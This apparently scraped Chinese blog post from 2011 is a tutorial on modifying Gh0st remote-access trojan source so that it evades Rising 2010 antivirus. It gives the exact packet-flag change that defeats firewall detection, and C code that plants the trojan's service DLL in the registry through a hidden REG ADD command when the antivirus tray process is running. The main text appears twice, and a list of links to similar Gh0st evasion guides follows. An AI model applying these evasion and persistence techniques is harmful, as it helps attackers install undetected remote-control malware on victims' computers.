源码免杀实战之Gh0st过瑞星2010主动和防火墙
2011-05-12 15:36
501 查看
1.瑞星防火墙:
过瑞星防火墙的方法很简单,只要修改两个地方就可以了。
gh0st\include\IOCPServer.cpp
Server\svchost\ClientSocket.cpp
BYTE bPacketFlag[] = {'G', 'h', '0', 's', 't'};
修改成任何字符即可,但要注意的是,这样修改后,就不能和以前的gh0st相兼容了,修改后的服务端
用以前的控制端将不能上线。
2.瑞星2010主动防御:
对于主动防御,最重要的是得知道怎么去定位主动防御到底查杀了哪段代码。这就需要我们耐
心的从代码入口开始去填充,直到填充到主动防御查杀的代码为止。
if(ProcessExit("rstray.exe"))
{
char szCommand[1024];
wsprintf(szCommand, "REG ADD HKEY_LOCAL_MACHINE\\%s /v ServiceDll /t REG_EXPAND_SZ /d \"%s\"", strSubKey, strModulePath);
WinExec(szCommand, SW_HIDE);
}
else
{
WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "ServiceDll", REG_EXPAND_SZ, (char *)strModulePath, lstrlen(strModulePath), 0);
}
过瑞星防火墙的方法很简单,只要修改两个地方就可以了。
gh0st\include\IOCPServer.cpp
Server\svchost\ClientSocket.cpp
BYTE bPacketFlag[] = {'G', 'h', '0', 's', 't'};
修改成任何字符即可,但要注意的是,这样修改后,就不能和以前的gh0st相兼容了,修改后的服务端
用以前的控制端将不能上线。
2.瑞星2010主动防御:
对于主动防御,最重要的是得知道怎么去定位主动防御到底查杀了哪段代码。这就需要我们耐
心的从代码入口开始去填充,直到填充到主动防御查杀的代码为止。
if(ProcessExit("rstray.exe"))
{
char szCommand[1024];
wsprintf(szCommand, "REG ADD HKEY_LOCAL_MACHINE\\%s /v ServiceDll /t REG_EXPAND_SZ /d \"%s\"", strSubKey, strModulePath);
WinExec(szCommand, SW_HIDE);
}
else
{
WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "ServiceDll", REG_EXPAND_SZ, (char *)strModulePath, lstrlen(strModulePath), 0);
}
相关文章推荐
- 网络安全:gh0st源码免杀360全套(3)
- gh0st3.6源码编译+++免杀教程
- 网络安全:gh0st源码免杀360全套(2)
- 远控软件gh0st源码免杀之我谈
- 网络安全:gh0st源码免杀360全套(1)
- Code First Entity Framework 6化被动为主动之explicit loading模式实战分析( 附源码)
- 网络安全:gh0st源码免杀小红伞Avira(3)
- Code First Entity Framework 6化被动为主动之explicit loading模式实战分析( 附源码)
- 网络安全:gh0st源码免杀小红伞Avira(2)
- 网络安全:gh0st源码免杀小红伞Avira(1)
- Gh0st3.6编译和源码免杀问题
- 网络安全:gh0st源码免杀Kaspersky
- 网络安全:gh0st源码免杀ESET_NOD32
- Code First Entity Framework 6化被动为主动之explicit loading模式实战分析( 附源码)
- android源码设计模式解析与实战 笔记 8.6节
- 网络防火墙实战-基于pfsense(2)
- libgdx游戏引擎教程实战篇(二)移植俄罗斯方块(附源码)
- 一、Android系统源码下载实战
- jQuery-1.9.1源码分析系列(十) 事件系统——主动触发事件和模拟冒泡处理